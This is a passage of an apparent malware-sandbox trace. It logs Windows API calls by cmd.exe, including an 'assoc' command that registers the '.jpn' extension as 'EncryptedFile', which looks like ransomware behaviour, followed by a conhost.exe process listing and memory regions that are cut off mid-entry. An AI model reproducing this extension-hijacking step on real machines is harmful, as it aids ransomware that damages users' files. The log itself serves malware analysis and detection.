(_String1="PROMPT", _String2="RANDOM") returned -2 [0271.634] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0271.634] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0271.634] GetProcessHeap () returned 0x740000 [0271.635] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x748718) returned 1 [0271.636] GetEnvironmentStringsW () returned 0x747cf0* [0271.636] GetProcessHeap () returned 0x740000 [0271.636] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xa32) returned 0x74a7c0 [0271.636] FreeEnvironmentStringsA (penv="A") returned 1 [0271.636] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0271.636] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0271.636] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0271.636] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0271.636] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0271.636] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0271.636] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0271.636] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0271.636] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0271.636] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0271.636] GetProcessHeap () returned 0x740000 [0271.637] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x44) returned 0x7405c8 [0271.637] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0271.637] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0271.637] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0271.637] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x740618 [0271.637] FindClose (in: hFindFile=0x740618 | out: hFindFile=0x740618) returned 1 [0271.637] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x740618 [0271.637] FindClose (in: hFindFile=0x740618 | out: hFindFile=0x740618) returned 1 [0271.638] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0271.638] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x740618 [0271.638] FindClose (in: hFindFile=0x740618 | out: hFindFile=0x740618) returned 1 [0271.638] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0271.638] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0271.638] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0271.638] GetProcessHeap () returned 0x740000 [0271.639] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74a7c0) returned 1 [0271.639] GetEnvironmentStringsW () returned 0x747cf0* [0271.639] GetProcessHeap () returned 0x740000 [0271.639] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xa76) returned 0x749d80 [0271.639] FreeEnvironmentStringsA (penv="=") returned 1 [0271.639] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0271.640] GetProcessHeap () returned 0x740000 [0271.640] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7405c8) returned 1 [0271.640] GetProcessHeap () returned 0x740000 [0271.640] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400e) returned 0x74bc80 [0271.641] GetProcessHeap () returned 0x740000 [0271.641] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x3e) returned 0x74a800 [0271.648] GetProcessHeap () returned 0x740000 [0271.648] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74bc80) returned 1 [0271.649] GetConsoleOutputCP () returned 0x1b5 [0271.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0271.654] GetUserDefaultLCID () returned 0x409 [0271.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0271.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0271.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0271.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0271.656] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0271.656] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0271.658] GetProcessHeap () returned 0x740000 [0271.659] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20c) returned 0x74a890 [0271.659] GetConsoleTitleW (in: lpConsoleTitle=0x74a890, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0271.694] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0271.694] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0271.694] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0271.694] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0271.695] GetProcessHeap () returned 0x740000 [0271.695] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400a) returned 0x74bc80 [0271.695] GetProcessHeap () returned 0x740000 [0271.695] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74bc80) returned 1 [0271.696] _wcsicmp (_String1="assoc", _String2=")") returned 56 [0271.696] _wcsicmp (_String1="FOR", _String2="assoc") returned 5 [0271.696] _wcsicmp (_String1="FOR/?", _String2="assoc") returned 5 [0271.696] _wcsicmp (_String1="IF", _String2="assoc") returned 8 [0271.696] _wcsicmp (_String1="IF/?", _String2="assoc") returned 8 [0271.696] _wcsicmp (_String1="REM", _String2="assoc") returned 17 [0271.696] _wcsicmp (_String1="REM/?", _String2="assoc") returned 17 [0271.696] GetProcessHeap () returned 0x740000 [0271.696] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x58) returned 0x74aaa8 [0271.697] GetProcessHeap () returned 0x740000 [0271.697] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x14) returned 0x747758 [0271.697] GetProcessHeap () returned 0x740000 [0271.697] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x30) returned 0x74ab08 [0271.698] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0271.710] _wcsicmp (_String1="assoc", _String2="DIR") returned -3 [0271.710] _wcsicmp (_String1="assoc", _String2="ERASE") returned -4 [0271.710] _wcsicmp (_String1="assoc", _String2="DEL") returned -3 [0271.710] _wcsicmp (_String1="assoc", _String2="TYPE") returned -19 [0271.710] _wcsicmp (_String1="assoc", _String2="COPY") returned -2 [0271.710] _wcsicmp (_String1="assoc", _String2="CD") returned -2 [0271.710] _wcsicmp (_String1="assoc", _String2="CHDIR") returned -2 [0271.710] _wcsicmp (_String1="assoc", _String2="RENAME") returned -17 [0271.710] _wcsicmp (_String1="assoc", _String2="REN") returned -17 [0271.710] _wcsicmp (_String1="assoc", _String2="ECHO") returned -4 [0271.710] _wcsicmp (_String1="assoc", _String2="SET") returned -18 [0271.710] _wcsicmp (_String1="assoc", _String2="PAUSE") returned -15 [0271.710] _wcsicmp (_String1="assoc", _String2="DATE") returned -3 [0271.710] _wcsicmp (_String1="assoc", _String2="TIME") returned -19 [0271.710] _wcsicmp (_String1="assoc", _String2="PROMPT") returned -15 [0271.710] _wcsicmp (_String1="assoc", _String2="MD") returned -12 [0271.710] _wcsicmp (_String1="assoc", _String2="MKDIR") returned -12 [0271.710] _wcsicmp (_String1="assoc", _String2="RD") returned -17 [0271.710] _wcsicmp (_String1="assoc", _String2="RMDIR") returned -17 [0271.710] _wcsicmp (_String1="assoc", _String2="PATH") returned -15 [0271.710] _wcsicmp (_String1="assoc", _String2="GOTO") returned -6 [0271.711] _wcsicmp (_String1="assoc", _String2="SHIFT") returned -18 [0271.711] _wcsicmp (_String1="assoc", _String2="CLS") returned -2 [0271.711] _wcsicmp (_String1="assoc", _String2="CALL") returned -2 [0271.711] _wcsicmp (_String1="assoc", _String2="VERIFY") returned -21 [0271.711] _wcsicmp (_String1="assoc", _String2="VER") returned -21 [0271.711] _wcsicmp (_String1="assoc", _String2="VOL") returned -21 [0271.711] _wcsicmp (_String1="assoc", _String2="EXIT") returned -4 [0271.711] _wcsicmp (_String1="assoc", _String2="SETLOCAL") returned -18 [0271.711] _wcsicmp (_String1="assoc", _String2="ENDLOCAL") returned -4 [0271.711] _wcsicmp (_String1="assoc", _String2="TITLE") returned -19 [0271.711] _wcsicmp (_String1="assoc", _String2="START") returned -18 [0271.711] _wcsicmp (_String1="assoc", _String2="DPATH") returned -3 [0271.711] _wcsicmp (_String1="assoc", _String2="KEYS") returned -10 [0271.711] _wcsicmp (_String1="assoc", _String2="MOVE") returned -12 [0271.711] _wcsicmp (_String1="assoc", _String2="PUSHD") returned -15 [0271.711] _wcsicmp (_String1="assoc", _String2="POPD") returned -15 [0271.711] _wcsicmp (_String1="assoc", _String2="ASSOC") returned 0 [0271.711] GetProcessHeap () returned 0x740000 [0271.711] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x58) returned 0x74ab40 [0271.713] GetProcessHeap () returned 0x740000 [0271.714] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x74ab40, Size=0x30) returned 0x74ab40 [0271.714] GetProcessHeap () returned 0x740000 [0271.714] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x74ab40) returned 0x30 [0271.714] GetProcessHeap () returned 0x740000 [0271.714] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x3c) returned 0x74ab78 [0271.714] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Classes", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19fa14 | out: phkResult=0x19fa14*=0xa0) returned 0x0 [0271.714] GetProcessHeap () returned 0x740000 [0271.714] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x58) returned 0x74abc0 [0271.716] GetProcessHeap () returned 0x740000 [0271.716] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x74abc0, Size=0x34) returned 0x74abc0 [0271.716] GetProcessHeap () returned 0x740000 [0271.717] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x74abc0) returned 0x34 [0271.717] GetProcessHeap () returned 0x740000 [0271.717] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x12) returned 0x747798 [0271.717] GetProcessHeap () returned 0x740000 [0271.717] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x24) returned 0x740578 [0271.717] RegCreateKeyExW (in: hKey=0xa0, lpSubKey=".jpn", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x19f9cc, lpdwDisposition=0x0 | out: phkResult=0x19f9cc*=0xa4, lpdwDisposition=0x0) returned 0x0 [0271.735] RegSetValueExW (in: hKey=0xa4, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="EncryptedFile", cbData=0x1c | out: lpData="EncryptedFile") returned 0x0 [0271.737] RegCloseKey (hKey=0xa4) returned 0x0 [0271.738] _vsnwprintf (in: _Buffer=0xd37940, _BufferCount=0x1fff, _Format="%s=%s\r\n", _ArgList=0x19f9ac | out: _Buffer=".jpn=EncryptedFile\r\n") returned 20 [0271.738] _get_osfhandle (_FileHandle=1) returned 0x3c [0271.738] GetFileType (hFile=0x3c) returned 0x2 [0271.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0271.738] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f984 | out: lpMode=0x19f984) returned 1 [0271.758] _get_osfhandle (_FileHandle=1) returned 0x3c [0271.758] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd37940*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x19f99c, lpReserved=0x0 | out: lpBuffer=0xd37940*, lpNumberOfCharsWritten=0x19f99c*=0x14) returned 1 [0271.774] ApiSetQueryApiSetPresence () returned 0x0 [0271.774] ResolveDelayLoadedAPI () returned 0x6ab62230 [0271.779] DoSHChangeNotify () returned 0x0 [0271.940] GetProcessHeap () returned 0x740000 [0271.941] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x740578) returned 1 [0271.941] GetProcessHeap () returned 0x740000 [0271.941] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x747798) returned 1 [0271.941] RegCloseKey (hKey=0xa0) returned 0x0 [0271.941] _get_osfhandle (_FileHandle=1) returned 0x3c [0271.941] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0271.963] _get_osfhandle (_FileHandle=1) returned 0x3c [0271.963] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0271.968] _get_osfhandle (_FileHandle=0) returned 0x38 [0271.969] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0272.004] SetConsoleInputExeNameW () returned 0x1 [0272.004] GetConsoleOutputCP () returned 0x1b5 [0272.021] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0272.021] SetThreadUILanguage (LangId=0x0) returned 0x409 [0272.035] exit (_Code=0) Thread: id = 170 os_tid = 0x460 Process: id = "24" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6530b000" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x8fc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2204 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2205 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2206 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2207 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2208 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2209 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2210 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2211 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2212 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2213 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2214 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2215 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2216 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2217 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2218 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2219 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2220 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2221 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2222 start_va = 0x810000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 2223 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2224 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2225 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2226 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2227 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2228 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2229 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2230 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2231 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2232 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2233 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2234 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2235 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2236 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2237 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2238 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2239 start_va = 0x970000 end_va = 0xaf7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 2240 start_va = 0xb00000 end_va = 0xc80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 2241 start_va = 0xc90000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 2242 start_va = 0x2090000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 2243 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2244 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2245 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2246 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2247 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2248 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2249 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2250 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2251 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2252 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2253 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = 